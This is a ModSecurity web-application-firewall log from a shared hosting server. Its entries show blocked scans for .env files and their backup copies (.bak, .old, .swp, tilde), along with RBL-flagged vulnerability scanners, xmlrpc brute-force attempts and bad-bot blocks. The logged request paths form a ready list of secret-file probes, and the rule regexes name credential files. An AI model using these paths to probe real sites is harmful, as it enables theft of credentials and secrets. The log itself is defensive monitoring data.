[Tue May 26 13:27:14.886977 2026] [security2:error] [pid 512745:tid 512972] [client 5.255.118.168:36670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahVSWnKSB_s2CvZg7xNiQAAAAWs"]
[Tue May 26 13:27:16.872692 2026] [security2:error] [pid 512745:tid 512940] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSXHKSB_s2CvZg7xNiYgAAAUs"]
[Tue May 26 13:27:17.197904 2026] [security2:error] [pid 512745:tid 512887] [client 188.132.150.107:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVSXXKSB_s2CvZg7xNibQAAARY"]
[Tue May 26 13:27:17.236856 2026] [security2:error] [pid 512344:tid 512555] [client 5.255.118.168:36642] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.copy"] [unique_id "ahVSXcbElyei4S77DQf7pAAAAFE"]
[Tue May 26 13:27:17.975522 2026] [security2:error] [pid 512745:tid 512900] [client 14.176.160.117:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSXXKSB_s2CvZg7xNidgAAASM"]
[Tue May 26 13:27:18.190104 2026] [security2:error] [pid 512344:tid 512516] [client 5.255.118.168:36982] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env~"] [unique_id "ahVSXsbElyei4S77DQf7tAAAACo"]
[Tue May 26 13:27:18.190284 2026] [security2:error] [pid 512344:tid 512585] [client 5.255.118.168:37024] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.old"] [unique_id "ahVSXsbElyei4S77DQf7tQAAAG8"]
[Tue May 26 13:27:18.190944 2026] [security2:error] [pid 512745:tid 512924] [client 5.255.118.168:37080] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.bak"] [unique_id "ahVSXnKSB_s2CvZg7xNihAAAATs"]
[Tue May 26 13:27:18.190949 2026] [security2:error] [pid 512745:tid 512906] [client 5.255.118.168:36950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.bak"] [unique_id "ahVSXnKSB_s2CvZg7xNigwAAASk"]
[Tue May 26 13:27:18.191415 2026] [security2:error] [pid 512745:tid 512990] [client 5.255.118.168:36996] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.orig"] [unique_id "ahVSXnKSB_s2CvZg7xNigQAAAX0"]
[Tue May 26 13:27:18.191718 2026] [security2:error] [pid 512745:tid 512917] [client 5.255.118.168:37036] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.backup"] [unique_id "ahVSXnKSB_s2CvZg7xNihQAAATQ"]
[Tue May 26 13:27:18.191855 2026] [security2:error] [pid 512344:tid 512516] [client 5.255.118.168:37070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.swp"] [unique_id "ahVSXsbElyei4S77DQf7tgAAACo"]
[Tue May 26 13:27:18.193481 2026] [security2:error] [pid 512344:tid 512600] [client 5.255.118.168:37104] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.backup"] [unique_id "ahVSXsbElyei4S77DQf7uAAAAH4"]
[Tue May 26 13:27:18.193479 2026] [security2:error] [pid 512344:tid 512571] [client 5.255.118.168:37072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.orig"] [unique_id "ahVSXsbElyei4S77DQf7twAAAGE"]
[Tue May 26 13:27:18.194034 2026] [security2:error] [pid 512344:tid 512530] [client 5.255.118.168:36958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.swp"] [unique_id "ahVSXsbElyei4S77DQf7uwAAADg"]
[Tue May 26 13:27:18.194081 2026] [security2:error] [pid 512344:tid 512516] [client 5.255.118.168:37144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.orig"] [unique_id "ahVSXsbElyei4S77DQf7vQAAACo"]
[Tue May 26 13:27:18.194161 2026] [security2:error] [pid 512344:tid 512514] [client 5.255.118.168:37128] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.swp"] [unique_id "ahVSXsbElyei4S77DQf7vAAAACg"]
[Tue May 26 13:27:18.194172 2026] [security2:error] [pid 512344:tid 512588] [client 5.255.118.168:37122] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production~"] [unique_id "ahVSXsbElyei4S77DQf7vgAAAHI"]
[Tue May 26 13:27:18.194484 2026] [security2:error] [pid 512745:tid 512950] [client 5.255.118.168:37090] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.old"] [unique_id "ahVSXnKSB_s2CvZg7xNiiQAAAVU"]
[Tue May 26 13:27:18.194647 2026] [security2:error] [pid 512745:tid 512924] [client 5.255.118.168:37016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.copy"] [unique_id "ahVSXnKSB_s2CvZg7xNihwAAATs"]
[Tue May 26 13:27:18.194825 2026] [security2:error] [pid 512344:tid 512559] [client 5.255.118.168:37010] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.copy"] [unique_id "ahVSXsbElyei4S77DQf7vwAAAFU"]
[Tue May 26 13:27:18.194864 2026] [security2:error] [pid 512745:tid 512990] [client 5.255.118.168:36942] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahVSXnKSB_s2CvZg7xNiigAAAX0"]
[Tue May 26 13:27:18.195105 2026] [security2:error] [pid 512344:tid 512596] [client 5.255.118.168:36962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahVSXsbElyei4S77DQf7ugAAAHo"]
[Tue May 26 13:27:18.195132 2026] [security2:error] [pid 512344:tid 512570] [client 5.255.118.168:36988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.bak"] [unique_id "ahVSXsbElyei4S77DQf7wAAAAGA"]
[Tue May 26 13:27:18.196329 2026] [security2:error] [pid 512745:tid 512943] [client 5.255.118.168:37064] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local~"] [unique_id "ahVSXnKSB_s2CvZg7xNiiwAAAU4"]
[Tue May 26 13:27:18.846141 2026] [security2:error] [pid 512745:tid 512807] [remote 74.7.241.58:33634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVSXnKSB_s2CvZg7xNilQABfj0"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:27:19.442137 2026] [security2:error] [pid 512745:tid 512901] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSX3KSB_s2CvZg7xNimAAAASQ"]
[Tue May 26 13:27:20.684316 2026] [security2:error] [pid 512344:tid 512581] [client 163.61.128.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVSYMbElyei4S77DQf76AAAAGs"]
[Tue May 26 13:27:20.939990 2026] [security2:error] [pid 512745:tid 512830] [remote 167.99.5.1:56356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.5.99.167.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVSYHKSB_s2CvZg7xNiqwABC1Q"]
[Tue May 26 13:27:21.468880 2026] [security2:error] [pid 512745:tid 512941] [client 185.191.171.7:32368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVSYXKSB_s2CvZg7xNitAAAAUw"]
[Tue May 26 13:27:21.469000 2026] [security2:error] [pid 512745:tid 512941] [client 185.191.171.7:32368] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVSYXKSB_s2CvZg7xNitAAAAUw"]
[Tue May 26 13:27:21.925236 2026] [security2:error] [pid 512344:tid 512530] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSYcbElyei4S77DQf7_QAAADg"]
[Tue May 26 13:27:22.076213 2026] [security2:error] [pid 512745:tid 512892] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSYXKSB_s2CvZg7xNitwAAARs"]
[Tue May 26 13:27:22.139987 2026] [security2:error] [pid 512344:tid 512538] [client 2401:4900:3761:a340:28f1:ce6d:12f7:1d40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVSYMbElyei4S77DQf77gAAQFo"], referer: https://kingsclub.in/indoor-party-hall/
[Tue May 26 13:27:22.163893 2026] [security2:error] [pid 512745:tid 512892] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSYXKSB_s2CvZg7xNitwAAARs"]
[Tue May 26 13:27:22.310967 2026] [security2:error] [pid 512745:tid 512963] [client 60.52.41.82:60314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 82.41.52.60.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVSYnKSB_s2CvZg7xNivgAAAWI"]
[Tue May 26 13:27:22.311079 2026] [security2:error] [pid 512745:tid 512963] [client 60.52.41.82:60314] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVSYnKSB_s2CvZg7xNivgAAAWI"]
[Tue May 26 13:27:22.954939 2026] [security2:error] [pid 512745:tid 512951] [client 4.201.75.230:13900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.samayikprasanga.in"] [uri "/inputs.php"] [unique_id "ahVSYnKSB_s2CvZg7xNiygAAAVY"]
[Tue May 26 13:27:23.035524 2026] [security2:error] [pid 512745:tid 512973] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSYnKSB_s2CvZg7xNixQAAAWw"]
[Tue May 26 13:27:23.109305 2026] [security2:error] [pid 512745:tid 512973] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSYnKSB_s2CvZg7xNixQAAAWw"]
[Tue May 26 13:27:24.002095 2026] [security2:error] [pid 512745:tid 512978] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSY3KSB_s2CvZg7xNi1gAAAXE"]
[Tue May 26 13:27:24.080752 2026] [security2:error] [pid 512745:tid 512978] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSY3KSB_s2CvZg7xNi1gAAAXE"]
[Tue May 26 13:27:24.123951 2026] [security2:error] [pid 512745:tid 512916] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSY3KSB_s2CvZg7xNi1QAAATM"]
[Tue May 26 13:27:24.969415 2026] [security2:error] [pid 512745:tid 512923] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSZHKSB_s2CvZg7xNi5gAAATo"]
[Tue May 26 13:27:25.049966 2026] [security2:error] [pid 512745:tid 512923] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSZHKSB_s2CvZg7xNi5gAAATo"]
[Tue May 26 13:27:25.948293 2026] [security2:error] [pid 512745:tid 512969] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSZXKSB_s2CvZg7xNi7wAAAWg"]
[Tue May 26 13:27:26.026697 2026] [security2:error] [pid 512745:tid 512969] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSZXKSB_s2CvZg7xNi7wAAAWg"]
[Tue May 26 13:27:26.078748 2026] [security2:error] [pid 512745:tid 512900] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSZXKSB_s2CvZg7xNi7QAAASM"]
[Tue May 26 13:27:26.901244 2026] [security2:error] [pid 512745:tid 512990] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSZnKSB_s2CvZg7xNi9QAAAX0"]
[Tue May 26 13:27:26.983578 2026] [security2:error] [pid 512745:tid 512990] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSZnKSB_s2CvZg7xNi9QAAAX0"]
[Tue May 26 13:27:27.853780 2026] [security2:error] [pid 512745:tid 512987] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSZ3KSB_s2CvZg7xNi_gAAAXo"]
[Tue May 26 13:27:27.893834 2026] [security2:error] [pid 512344:tid 512504] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSZ8bElyei4S77DQf8WAAAAB4"]
[Tue May 26 13:27:27.930874 2026] [security2:error] [pid 512745:tid 512987] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSZ3KSB_s2CvZg7xNi_gAAAXo"]
[Tue May 26 13:27:28.806010 2026] [security2:error] [pid 512745:tid 512918] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSaHKSB_s2CvZg7xNjBQAAATU"]
[Tue May 26 13:27:28.886325 2026] [security2:error] [pid 512745:tid 512918] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSaHKSB_s2CvZg7xNjBQAAATU"]
